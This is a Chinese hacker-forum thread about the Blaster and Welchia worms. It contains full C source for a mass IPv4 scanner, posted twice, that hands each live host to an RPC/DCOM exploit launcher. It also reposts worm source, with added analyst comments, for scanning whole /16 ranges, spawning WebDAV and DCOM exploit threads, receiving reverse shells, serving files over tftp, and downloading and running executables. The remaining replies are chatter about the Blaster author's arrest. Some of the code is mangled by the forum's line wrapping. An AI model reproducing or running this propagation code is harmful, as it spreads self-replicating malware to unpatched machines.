            ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK);
            if (ret == -1) {
                printf("Unable to set O_NONBLOCK\n");
                close(connlist[i].s);
            }
            else {
              memset((char *)ip, 0, 20);
              sprintf(ip, "%d.%d.%d.%d", aa, bb, cc, dd);
              connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
              if (connlist[i].addr.sin_addr.s_addr == -1)
                  fatal("Invalid IP.");
              connlist[i].addr.sin_family = AF_INET;
              connlist[i].addr.sin_port = htons(port);
              connlist[i].a = time(0);
              connlist[i].status = S_CONNECTING;
              dd++;
              }
          }
        }
    }

    check_sockets();
  }

}

/* Mark every slot of connlist[] free and zero its address. Run once before the scan loop. */
void init_sockets(void)
{
  int i;

  for (i = 0; i < MAX_SOCKETS; i++) {
      connlist[i].status = S_NONE;
      memset((struct sockaddr_in *)&connlist[i].addr, 0,
            sizeof(struct sockaddr_in));
  }
}

/*
 * One pass over connlist[].  Every S_CONNECTING slot older than TIMEOUT
 * seconds is closed; on the others connect() is (re)issued on the
 * non-blocking socket and the outcome handled:
 *   - connect() == 0        : treated as a live host.  "./serv <ip>" is
 *     formatted into a 100-byte stack buffer and run with system(), then
 *     the slot is closed.  This is the hand-off to the exploit launcher,
 *     which makes scan + serv + vdcom a propagation chain rather than a
 *     plain port scanner.
 *   - errno == EISCONN      : the address is printed and the slot closed;
 *     serv is NOT run on this path.  The branch then falls through into the
 *     generic-error test below it, so the fd is closed a second time.
 *   - EALREADY / EINPROGRESS: still pending, slot left alone.
 *   - anything else         : slot closed.
 *
 * Several printf()/sprintf() calls pass more arguments than their format
 * consumes, and the "Done with %s" printf() passes none at all (undefined
 * behaviour).
 */
void check_sockets(void)
{
  int i, ret;

  for (i = 0; i < MAX_SOCKETS; i++) {
      /* expire connects that have been pending longer than TIMEOUT seconds */
      if ((connlist[i].a < (time(0) - TIMEOUT)) &&
          (connlist[i].status == S_CONNECTING)) {
        close(connlist[i].s);
        connlist[i].status = S_NONE;
      }

      else if (connlist[i].status == S_CONNECTING) {
        ret = connect(connlist[i].s,
                      (struct sockaddr *)&connlist[i].addr,
                      sizeof(struct sockaddr_in));
        if (ret == -1) {
            if (errno == EISCONN) {
              printf("%s\n",
                      (char *)inet_ntoa(connlist[i].addr.sin_addr),
                      (time(0)-connlist[i].a));
              close(connlist[i].s);
              connlist[i].status = S_NONE;
            }

            /* also reached with errno == EISCONN (see above) */
            if ((errno != EALREADY) && (errno != EINPROGRESS)) {
              close(connlist[i].s);
              connlist[i].status = S_NONE;
            }
                   
        }
       
        else {
  /* connect completed synchronously: hand the host to the launcher script */
  char luck[100];
  sprintf(luck,"./serv %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
          printf("Attempting RPC/DCOM on %s\n",
                  (char *)inet_ntoa(connlist[i].addr.sin_addr),
                  (time(0)-connlist[i].a));
          system(luck);
  /* "%s" with no argument: undefined behaviour */
  printf("Done with %s Next ...\n");
          close(connlist[i].s);
          connlist[i].status = S_NONE;
        }
      }
  }
}

/* Print `err`, close every socket still in use and exit with -1 (status 255).
 * Called from main() on bad arguments and on an inet_addr() failure. */
void fatal(char *err)
{
  int i;
  printf("Error: %s\n", err);
  for (i = 0; i < MAX_SOCKETS; i++) {
      if (connlist[i].status >= S_CONNECTING)
        close(connlist[i].s);
  }
  exit(-1);
}


B2层 发表时间: 10/20 21:53

回复: abctm [abctm]   版主   登录
SCAN.c


#include <stdio.h>
#include <string.h>
#include <time.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>

#define MAX_SOCKETS 1000
#define TIMEOUT 2

#define S_NONE      0
#define S_CONNECTING 1

/* One slot of the scanner's connection table. */
struct conn_t {
  int s;                    /* socket fd; meaningful only while status != S_NONE */
  char status;              /* S_NONE (free) or S_CONNECTING (connect in flight) */
  time_t a;                 /* time(0) when the slot was filled; compared against TIMEOUT */
  struct sockaddr_in addr;  /* target address/port for this slot */
};
/* global fixed-size table: filled by main(), drained by check_sockets() */
struct conn_t connlist[MAX_SOCKETS];

void init_sockets(void);
void check_sockets(void);
void fatal(char *);

/*
 * Scanner entry point.  Walks the IPv4 space sequentially from
 * <a-block>.<b-block>.<c-block>.0, keeping up to MAX_SOCKETS non-blocking
 * TCP connects to <port> in flight; check_sockets() decides what happens to
 * each one and is where "./serv <ip>" is spawned for hosts that connect.
 *
 * argv: <a-block> <port> [b-block] [c-block].  Each block is atoi()'d and
 * range-checked to 0..255; the port is only rejected when it is 0.
 *
 * main() only creates the socket, sets O_NONBLOCK and fills in the address
 * and timestamp; the connect() call itself is issued by check_sockets().
 * `done` is never set, so the while loop has no normal exit: after the last
 * address it either spins calling check_sockets() with nothing pending, or
 * reaches a ".255" last octet, which inet_addr() rejects and fatal() aborts
 * the run.  scantime is assigned but never read.
 */
int main(int argc, char *argv[])
{
  int done, i, aa, bb, cc, dd, ret, k, ns;
  unsigned int port;
  time_t scantime;
  char ip[20];

  if (argc < 3) {
    printf("Usage: %s <a-block> <port> [b-block] [c-block]\n", argv[0]);
    return -1;
  }

  done = 0; bb = 0; cc = 0; dd = 0; aa = 0; port = 0;

  aa = atoi(argv[1]);
  if ((aa < 0) || (aa > 255)) {
    fatal("Invalid a-range\n");
  }
 
  port = (unsigned int)atoi(argv[2]);
  if (port == 0)
    fatal("Bad port number.\n"); 

  if (argc >= 4) {
    bb = atoi(argv[3]);
    if ((bb < 0) || (bb > 255))
        fatal("Invalid b-range.\n");
  }

  if (argc >= 5) {
    cc = atoi(argv[4]);
    if ((cc < 0) || (cc > 255))
        fatal("Invalid c-range.\n");
  } 

  init_sockets();

  scantime = time(0);

  while(!done) {
    for (i = 0; i < MAX_SOCKETS; i++) {
        /* carry dd -> cc -> bb -> aa; the last octet runs 0..254, 255 triggers the carry.
         * Once all four octets are exhausted, stop filling slots only when no connect is outstanding. */
        if (dd == 255) {
          if (cc < 255) {
              cc++;
              dd = 0;
          }
          else {
              if (bb < 255) {
                bb++;
                cc = 0;
                dd = 0;
              }
              else {
                if (aa < 255) {
                    aa++;
                    bb = 0;
                    cc = 0;
                    dd = 0;
                }
                else {
                    ns = 0;
                    for (k = 0; k < MAX_SOCKETS; k++) {
                        if (connlist[k].status > S_NONE)
                          ns++;
                    }

                    if (ns == 0)
                      break;
                }
              }
          }
      }

        /* free slot: prepare a non-blocking socket for the current address;
         * the connect() itself happens in check_sockets() */
        if (connlist[i].status == S_NONE) {
          connlist[i].s = socket(AF_INET, SOCK_STREAM, 0);
          if (connlist[i].s != -1) {
            ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK);
            if (ret == -1) {
                printf("Unable to set O_NONBLOCK\n");
                close(connlist[i].s);
            }
            else {
              memset((char *)ip, 0, 20);
              sprintf(ip, "%d.%d.%d.%d", aa, bb, cc, dd);
              connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
              if (connlist[i].addr.sin_addr.s_addr == -1)
                  fatal("Invalid IP.");
              connlist[i].addr.sin_family = AF_INET;
              connlist[i].addr.sin_port = htons(port);
              connlist[i].a = time(0);
              connlist[i].status = S_CONNECTING;
              dd++;
              }
          }
        }
    }

    check_sockets();
  }

}

/* Mark every slot of connlist[] free and zero its address. Run once before the scan loop. */
void init_sockets(void)
{
  int i;

  for (i = 0; i < MAX_SOCKETS; i++) {
      connlist[i].status = S_NONE;
      memset((struct sockaddr_in *)&connlist[i].addr, 0,
            sizeof(struct sockaddr_in));
  }
}

/*
 * One pass over connlist[].  Every S_CONNECTING slot older than TIMEOUT
 * seconds is closed; on the others connect() is (re)issued on the
 * non-blocking socket and the outcome handled:
 *   - connect() == 0        : treated as a live host.  "./serv <ip>" is
 *     formatted into a 100-byte stack buffer and run with system(), then
 *     the slot is closed.  This is the hand-off to the exploit launcher,
 *     which makes scan + serv + vdcom a propagation chain rather than a
 *     plain port scanner.
 *   - errno == EISCONN      : the address is printed and the slot closed;
 *     serv is NOT run on this path.  The branch then falls through into the
 *     generic-error test below it, so the fd is closed a second time.
 *   - EALREADY / EINPROGRESS: still pending, slot left alone.
 *   - anything else         : slot closed.
 *
 * Several printf()/sprintf() calls pass more arguments than their format
 * consumes, and the "Done with %s" printf() passes none at all (undefined
 * behaviour).
 */
void check_sockets(void)
{
  int i, ret;

  for (i = 0; i < MAX_SOCKETS; i++) {
      /* expire connects that have been pending longer than TIMEOUT seconds */
      if ((connlist[i].a < (time(0) - TIMEOUT)) &&
          (connlist[i].status == S_CONNECTING)) {
        close(connlist[i].s);
        connlist[i].status = S_NONE;
      }

      else if (connlist[i].status == S_CONNECTING) {
        ret = connect(connlist[i].s,
                      (struct sockaddr *)&connlist[i].addr,
                      sizeof(struct sockaddr_in));
        if (ret == -1) {
            if (errno == EISCONN) {
              printf("%s\n",
                      (char *)inet_ntoa(connlist[i].addr.sin_addr),
                      (time(0)-connlist[i].a));
              close(connlist[i].s);
              connlist[i].status = S_NONE;
            }

            /* also reached with errno == EISCONN (see above) */
            if ((errno != EALREADY) && (errno != EINPROGRESS)) {
              close(connlist[i].s);
              connlist[i].status = S_NONE;
            }
                   
        }
       
        else {
  /* connect completed synchronously: hand the host to the launcher script */
  char luck[100];
  sprintf(luck,"./serv %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
          printf("Attempting RPC/DCOM on %s\n",
                  (char *)inet_ntoa(connlist[i].addr.sin_addr),
                  (time(0)-connlist[i].a));
          system(luck);
  /* "%s" with no argument: undefined behaviour */
  printf("Done with %s Next ...\n");
          close(connlist[i].s);
          connlist[i].status = S_NONE;
        }
      }
  }
}

/* Print `err`, close every socket still in use and exit with -1 (status 255).
 * Called from main() on bad arguments and on an inet_addr() failure. */
void fatal(char *err)
{
  int i;
  printf("Error: %s\n", err);
  for (i = 0; i < MAX_SOCKETS; i++) {
      if (connlist[i].status >= S_CONNECTING)
        close(connlist[i].s);
  }
  exit(-1);
}


B3层 发表时间: 10/20 21:54

回复: qfwuying [qfwuying]      登录
一个字~~~帅!!!顶!!!

B4层 发表时间: 10/20 22:32

回复: abctm [abctm]   版主   登录
呵呵

B5层 发表时间: 10/20 23:14

回复: abctm [abctm]   版主   登录
呵呵

B6层 发表时间: 10/23 13:04

回复: hotice [hotice]   论坛用户   登录
听说冲击波病毒的作者是个高中生,到底是不是啊


B7层 发表时间: 10/23 16:28

回复: coody [coody]   论坛用户   登录
你管他是还是不是。

B8层 发表时间: 10/23 17:17

回复: abctm [abctm]   版主   登录
是的呀!
美国官方宣布FBI在8月29日逮捕了一名"冲击波"(Blaster)病毒嫌疑犯Jeffrey Lee Parson,明尼苏达州18岁的高中生。
附图

他的体形不好

B9层 发表时间: 10/23 19:31

回复: smx8796 [smx8796]   论坛用户   登录
可是头上的那几根为数不多的毛还是挺帅的哦
你们说类!
高手。。。。

B10层 发表时间: 10/23 20:09

回复: abctm [abctm]   版主   登录
好看,今年的流行款式
你也作一个那样的头

B11层 发表时间: 10/24 08:17

回复: kdbilly [kdbilly]   论坛用户   登录
虽然不帅,但看起来智商蛮高用脑过度所以。。掉毛了~
哈哈

B12层 发表时间: 10/24 16:00

回复: abctm [abctm]   版主   登录
楼上的想象力丰富啊

B13层 发表时间: 10/24 17:34

回复: snntss [snntss]   论坛用户   登录
    我同意上铺的看法!

B14层 发表时间: 11/29 02:58

回复: snntss [snntss]   论坛用户   登录
我同意上铺的看法

B15层 发表时间: 11/29 02:58

回复: bridex [bridex]   论坛用户   登录
垃圾.大部分是照抄其它代码的.


B16层 发表时间: 11/29 08:16

回复: afan271314 [afan271314]   论坛用户   登录
楼上的  你怎么不超一个啊 你可以把他的改一下  在弄个冲击波二代

B17层 发表时间: 11/29 14:15

回复: bridex [bridex]   论坛用户   登录
你到安焦看看就会明白.


B18层 发表时间: 11/29 20:43

回复: lgf [lgf]   论坛用户   登录
呵呵
不错呀~1

B19层 发表时间: 11/30 14:28

回复: bridex [bridex]   论坛用户   登录
About ...
新蠕虫作者网上现身-不满微软和杀毒厂商


前言:“冲击波”蠕虫爆发后,大量个人主机及服务器遭受侵袭,各大安全公司,杀毒厂商纷纷推出各种解决方案,不料短短几日内,又出现了来历不明的新蠕虫,经过一些安全专家的反向编译和分析,惊讶的发现,该蠕虫的工作目标居然是消灭冲击波蠕虫并自动为受害主机进行补丁,而且该蠕虫还具有定时自毁功能,显然作者的目标还是有一定的善意因素,但是蠕虫毕竟是蠕虫,因为大量icmp包的发送,还是能够给企业局域网络带来极大的压力,就此,对蠕虫的危害性依然要保持极大的关注和警惕,相关文章可以参见
http://www.donews.com/donews/article/5/50423.html

8月20日,蠕虫作者突然现身,出现在某安全论坛,以下是该作者论坛上声明的转载,并公开了源代码。

下文为作者自述-转自某安全论坛

玩过了~~ 虫虫四个小时之内已经完成了任务~~~ 不得不写这豆腐块~~~
char *szMe = "=========== I love my wife & baby :-)~~~ Welcome Chian~~~
Notice: 2004 will remove myself:-)~~ sorry zhongli~~~=========== wins";

偶:小地方小公司小小程序员
偶从不玩安全的,临时抱佛脚,看了些资料,仓促写了这个烂虫虫~~~

A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ,虽然偶临时玩安全的即兴之作亦很烂
~~~
B 看不惯国内某几家放毒公司的商业炒作,发网难财,违背良心,误导民众
偶就帮你丫的除光了虫虫,打光了补丁,没想到他丫的误导的更变态~~~ 你丫的方脑壳
~~
C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~
D VirusBOy 兄,baby 可不是情人吆,偶家小子两岁就开始跟偶抢机器了~~
E 长了这么大,算首次报效社会吧~~~
F 几年?进去就是了,不就是个坐吗, 切~~~ 偶是吓大的!

======================================================
0 chian 系 china 笔误~~ 敲的快了,某个指头先到:-)~~~

1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~

2 RpcDcom & WebDav 使用同一 反向shellcode, 用 eyas的, lion修改
(声明:谁也没给偶,偶从一被人遗忘的公开程序中sniffer的,谢两位)
此shellcode 新进程建在svchost下,就一个Call Ebx 通杀了 all 2k & xp
他丫的,还有放毒公司言导致xp机器重启云云的~~~

3 Bill该死 有 Tftpd.exe, 干吗不用,虽然偶看过 Tftp 协议,练习写过~~~

4 某年某月某日某时某刻,
溜出国门,辗转借了几台 Xeon(TM) 4 cpus, 2g memory 机器
架起 2000 线程的 WebDav 投放玩具,对准某国骨干的几个B段
10 分钟内投放了三四百个种子(早知道有这么多,就换个玩法 :-)~~~

5 发icmp包是为了提高搜索效率,算唯一的危害了~~~ 刺激一下也好~~~
打补丁的虫,杀虫的虫,再不有点儿小危害就丢尽了虫虫家族的脸~~~


//偶婆婆, 烂代码~~~ 将就看吧~~~
// Analyst notes (the worm's "patch the victim" routine). Called once from
// DoIt() on every newly infected host, before the scanning loop starts.
//
// What it does, per the visible code:
//   1. Only proceeds on Windows 2000 (0) or XP (1) as reported by Win2000OrXp().
//   2. Bails if ReadRegServicePack() already reports the fix as installed
//      (presumably a registry lookup of the hotfix key - confirm in that helper).
//   3. Picks a language-specific download URL from the OEM code page and the
//      system LCID. Only English, Simplified Chinese, Traditional Chinese and
//      Korean systems are patched; Japanese and every other locale return
//      FALSE and stay unpatched (but still infected - DoIt() ignores the
//      return value).
//   4. Downloads the hotfix to "RpcServicePack.exe" in the current directory,
//      runs it with "-n -o -z -q", waits up to six minutes, deletes the file
//      and force-reboots the machine if the registry now shows the fix.
//
// Security-relevant caveats for anyone reading this for detection / IR:
//   - Nothing visible here validates what DownloadSpFile() fetched (no hash or
//     signature check) before MakeProcess() executes it under whatever account
//     the worm runs as (service mode, per the author's note on DoIt()). The URL
//     tables szWin2kSpUrl / szWinXPSpUrl are defined outside this listing.
//   - Host indicators: a dropped and then removed "RpcServicePack.exe", a
//     hotfix install minutes after infection, and an unsolicited forced reboot.
//   - The function returns TRUE once the installer exits, even when the
//     registry check afterwards fails, so TRUE does not mean "patched".
//
// Returns: TRUE if the installer ran to completion, FALSE on any early exit.
BOOL DoServicePackFunction()
{
DWORD nSystemVer = Win2000OrXp();
if ( !( nSystemVer == 0 || nSystemVer == 1) )
return FALSE; // not 2k or xp

if ( ReadRegServicePack(nSystemVer) )
return FALSE; // fix already installed

// Identify the language edition: OEM code page plus primary/sub language of
// the system default LCID select the download URL (index into the URL tables).
int nLanguageID;
unsigned int unOemCP = GetOEMCP();

LCID lcid = GetSystemDefaultLCID();
WORD wMain = PRIMARYLANGID(lcid);
WORD wSub = SUBLANGID(lcid);


if ( unOemCP == 437 && wMain == 9 && wSub == 1 ) //en
nLanguageID = 0; // US English (OEM CP 437, LANG_ENGLISH / SUBLANG_ENGLISH_US); author: other European locales deliberately not handled
else if ( unOemCP == 936 && wMain == 4 && wSub == 2 ) //cn
nLanguageID = 1; // Simplified Chinese - the author's primary target
else if ( unOemCP == 950 && wMain == 4 && wSub == 1 ) //tw
nLanguageID = 2; // Traditional Chinese
else if ( unOemCP == 932 && wMain == 0x11 && wSub == 1 ) //jp
nLanguageID = -1; // Japanese: recognised but deliberately left unpatched (author's choice)
else if ( unOemCP == 949 && wMain == 0x12 && wSub == 1 ) //kr
nLanguageID = 3; // Korean
else{
nLanguageID = -1; // any other locale: no patch
}

if ( nLanguageID == -1)
return FALSE;

// Relative path: the hotfix is written into the worm's current directory.
char szServicePack[] = "RpcServicePack.exe";

// Download the hotfix for the detected OS / language. No integrity check of
// the downloaded file is visible between here and MakeProcess().
if ( !nSystemVer ) { // 2k
if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )
return FALSE;
}
else{
if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )
return FALSE;
}

// Command line for the installer. The switches look like the usual Microsoft
// hotfix installer options (no backup, overwrite OEM files, no reboot, quiet)
// - confirm against the installer actually served by the URLs.
char szExec[180];
sprintf(szExec, "%s -n -o -z -q", szServicePack);

HANDLE hProcess = MakeProcess( szExec );
if ( hProcess == NULL )
return FALSE;

if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ // not finished within six minutes: kill the installer and clean up
TerminateProcess(hProcess,1);
CloseHandle(hProcess);
DeleteFile(szServicePack);
return FALSE;
}
CloseHandle(hProcess);

Sleep(15000);
DeleteFile(szServicePack); // remove the dropped installer
if ( ReadRegServicePack(nSystemVer) ) {
ShutDownWindows( EWX_REBOOT | EWX_FORCE );// registry now reports the fix: force an immediate reboot (EWX_FORCE does not wait for applications to close)
Sleep(20000); // author's note: the patch is ineffective until reboot; this sleep just lets the shutdown take effect
}

return TRUE;
}

// IN: 始ip, B段数量, 是否随机,是否换WebDav //更烂~~~ 凑合着看~~~
// Analyst notes: the worm's scanning / propagation loop. Walks nBCount
// consecutive /16 blocks starting at ulIpStart (host byte order), or the same
// number of random addresses from MakeRandIp() when bRand is set, and hands
// each target to one exploit thread: ExploitWebDavThread (IIS WebDAV) when
// bWebDav is set, otherwise ExploitRpcDcomThread (RPC DCOM, TCP/135). Both
// thread routines live outside this listing.
//
// Parameters (per the author's note): start IP, number of /16 blocks,
// random-target flag, WebDAV-instead-of-DCOM flag. No return value.
//
// Behaviour worth knowing for detection:
//   - Targets with any octet equal to 0xC5 (197), or any two adjacent octets
//     both equal to 0x99 (153), are skipped; the author's stated reason is to
//     spare certain ranges, not to evade anything.
//   - In-flight threads are capped at nMaxThread (300 per the author's
//     comment) via the global g_CurThreadCount, with a Sleep(2) between thread
//     creations, so one /16 yields up to 65536 connection attempts with a few
//     hundred in flight at a time.
//   - Each thread receives a heap-allocated u_long holding the target in
//     network byte order; the thread presumably frees it - confirm in the
//     thread routines.
//   - Only the previous thread's handle is closed before the next is created;
//     the last handle created is never closed (minor handle leak, left as-is).
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL bWebDav)
{
HANDLE hThread = NULL;
BOOL bFirst = TRUE;
u_long uComp;

for (int i=0;i< (nBCount * 256 * 256); i++){

if ( bRand )
uComp = MakeRandIp();
else
uComp = i + ulIpStart;

if ( // skip list (author: so that an infected target does not later take out the next generation; "better not to do damage")
(BYTE)uComp == 0xc5 ||
(BYTE)(uComp>>8) == 0xc5 ||
(BYTE)(uComp>>16) == 0xc5 ||
(BYTE)(uComp>>24) == 0xc5 ||
(WORD)uComp == 0x9999 ||
(WORD)(uComp>>8) == 0x9999 ||
(WORD)(uComp>>16) == 0x9999 )
continue;


// Per-target parameter for the thread; ownership passes to the thread.
u_long *myPara = new u_long;

if ( myPara == NULL ){// allocation failed: wait briefly and retry once (old MSVC runtime returns NULL here; a conforming new would throw)
Sleep(100);
myPara = new u_long;
}

if ( myPara ){
if ( hThread )
CloseHandle(hThread); // drop the handle of the previous thread only

*myPara = htonl( uComp); // thread routines expect network byte order

DWORD dwThreadId;

if (bWebDav)
hThread =
CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,&dwThreadId);
else
hThread =
CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,&dwThreadId);

Sleep(2);
}

// Author's note: added to avoid a start-up race in which the threads'
// InterlockedIncrement(&g_CurThreadCount) has not run yet and N threads
// are created in one burst on the first pass.
if ( bFirst && (i >= nMaxThread) ){
Sleep(2000);
bFirst = FALSE;
}

while(g_CurThreadCount >= nMaxThread) // #define nMaxThread 300 - author admits this was "overdone"
Sleep(2);

}

Sleep(60000); // let the last batch of threads finish before the caller moves on
}


//服务模式和控制台模式公用主程序
// Analyst notes: shared main routine for service mode and console mode (per
// the author's comment). Runs once per infected host:
//   1. WSAStartup, then KillMsblast() (removes the Blaster worm this one hunts).
//   2. Kill switch: if the local year is 2004, delete the worm's own service
//      and its tftpd service, RemoveMe() and exit - the self-removal announced
//      in szMe ("2004 will remove myself").
//   3. Builds the ICMP echo payload (0xAA fill), the WebDAV and RPC DCOM
//      exploit buffers, and patches the reverse-connect IP/port into them.
//   4. DoServicePackFunction() - tries to patch the host; return value ignored.
//   5. Starts RecvSendCmdThread (blocks on reverse connections from exploited
//      hosts, one handler thread each) and (re)installs / starts the tftpd
//      service, presumably used to serve the worm's files to new victims.
//   6. Loops forever: local /16, then three neighbouring /16s (DCOM), then one
//      /16 from the wdIpHead table over WebDAV, then one random /16, then
//      KillMsblast() again. The author estimates ~2 h per iteration.
//
// Indicators for detection / IR drawn from this code: ICMP echo requests whose
// payload is all 0xAA; a tftpd service (szServiceTftpd) plus the worm's own
// service (szServiceName); outbound TCP/135 and WebDAV sweeps of whole /16s;
// removal of both services once the clock reads 2004.
//
// Transcription caveats: several lines are mangled by the forum's wrapping
// ("WSADATAwsd;", backticks around \xAA, "(L"/"PVOID)" split across two
// lines, "for(;;-)"). The intent is obvious but the text as posted does not
// compile; it is left untouched here.
void DoIt()
{
WSADATAwsd; // transcription: "WSADATA wsd;"
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
return;

// Kill the Blaster worm (msblast) if present.
KillMsblast();

// Self-removal kill switch, keyed on the local clock.
SYSTEMTIME st;
GetLocalTime(&st);
if ( st.wYear == 2004 ){
MyDeleteService(szServiceName);
MyDeleteService(szServiceTftpd);
RemoveMe();
ExitProcess(1); // author: not strictly needed - RemoveMe() reuses borrowed code that, on 2k, deletes the worm's own file at process exit
}

srand( GetTickCount() );

memset(pPingBuffer, `\xAA`, sizeof(pPingBuffer)); // ICMP echo payload fill (transcription: backticks stand for single quotes)
// Author's note: asks backbone routers to drop echo requests with this
// payload signature, claiming the domestic Blaster outbreak is over and
// "enough patches have been applied".


// WebDAV send buffer: 68000 bytes, retried every 100 ms while new returns
// NULL (old MSVC runtime semantics). The Sleep also runs on success.
do{
pWebDavExploitBuffer = new char[68000];
Sleep(100);
}while(pWebDavExploitBuffer == NULL);

// Assemble both exploit payloads once, before CheckOnlienAndPressData()
// fixes up the reverse-connect fields inside them.
PressWebDavBufferOnce();
PressRpcDcomBufferOnce();

CheckOnlienAndPressData(); // get the local IP & patch the reverse-connect IP and port into the payloads

// Patch the host (see DoServicePackFunction); failure is ignored.
DoServicePackFunction();

// Receiver thread for reverse connections. NOTE: the listing wraps the
// cast "(LPVOID)NULL" across two lines below; it is one token.
DWORD dwThreadID;
HANDLE
hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L
PVOID)NULL,0,&dwThreadID);
if(hWorkThread==NULL) // RecvSendCmdThread blocks; on each reverse connection it spawns another thread, so several are handled concurrently
return;
CloseHandle(hWorkThread);

// Start the tftpd service; if that fails, install it and try once more
// (second result ignored).
if ( !MyStartService(szServiceTftpd) ){
Sleep(1000);
InstallTftpService();
Sleep(1000);
MyStartService(szServiceTftpd);
}

Sleep(2000); // wait for the receiver thread to choose its global random bind port


u_long ulIP;
for(;;-){ // author's estimate: one full iteration takes ~2 h on an ordinary machine (transcription: "-" is an artifact of "for(;;)")


// 1) Local /16: mask the local IP to its /16 and sweep it over RPC DCOM.
CheckOnlienAndPressData();
ulIP = ntohl(inet_addr(szLocalIp));
ulIP &= 0xffff0000;
BeginExploitFunction( ulIP, 1, 0, 0);


// 2) Three neighbouring /16s: the three above (+1) or the three below (-3), chosen at random.
CheckOnlienAndPressData();
if ( rand() % 2)
ulIP += 0x00010000;
else
ulIP -= 0x00030000;
BeginExploitFunction( ulIP, 3, 0, 0);


// 3) One /16 from the 76-entry wdIpHead table (its entry forms the high
//    word, i.e. the first two octets), over WebDAV - the author's way
//    around backbone filtering of TCP/135 SYNs. The author apologises to
//    the owners of those ranges and asks them to remediate.
CheckOnlienAndPressData();
ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]);
BeginExploitFunction( ulIP, 1, 0, 1);


// 4) One /16's worth of random addresses, RPC DCOM or WebDAV at random
//    (ulIP is ignored when bRand is 1).
CheckOnlienAndPressData();
if ( rand() % 2)
BeginExploitFunction( ulIP, 1, 1, 0);
else
BeginExploitFunction( ulIP, 1, 1, 1);


KillMsblast();

}

//WSACleanup();  // unreachable: the loop above never exits

}

--------------------------------------------------------------------------------------------------

为方便阅读,增加几个补充说明

1.flashsky www.xfocus.net创始人之一,启明星辰安全专家,擅长古体诗词,7月中公开rpc漏洞利用方式源代码,公开溢出分析报告,造成全球安全领域的震动,冲击波蠕虫的主要传播技术来源于这位高手公开的技术描述。

2.VirusBOy 懂点安全的小朋友,水平不咋地,不过你最好别招惹他,DDOS你一把也够受的。

3.某安全公司安全专家评论,该帖子内容基本属实,蠕虫源代码已经得到确认

B20层 发表时间: 12/01 10:20

回复: hacants [hacants]   论坛用户   登录
请问这是拿什么语言写的啊?我也要学

B21层 发表时间: 12/02 14:12

回复: hd37 [hd37]   论坛用户   登录
嚣张哦

B22层 发表时间: 12/02 16:50

回复: whq1015 [whq1015]   论坛用户   登录
你把代码公开
不是埋下了隐型炸弹吗??
/

B23层 发表时间: 12/03 14:30

回复: cailiao2 [cailiao2]   论坛用户   登录
scan.c上面那一段是什么意思,不像是宏定义吧

B24层 发表时间: 05-04-03 16:47
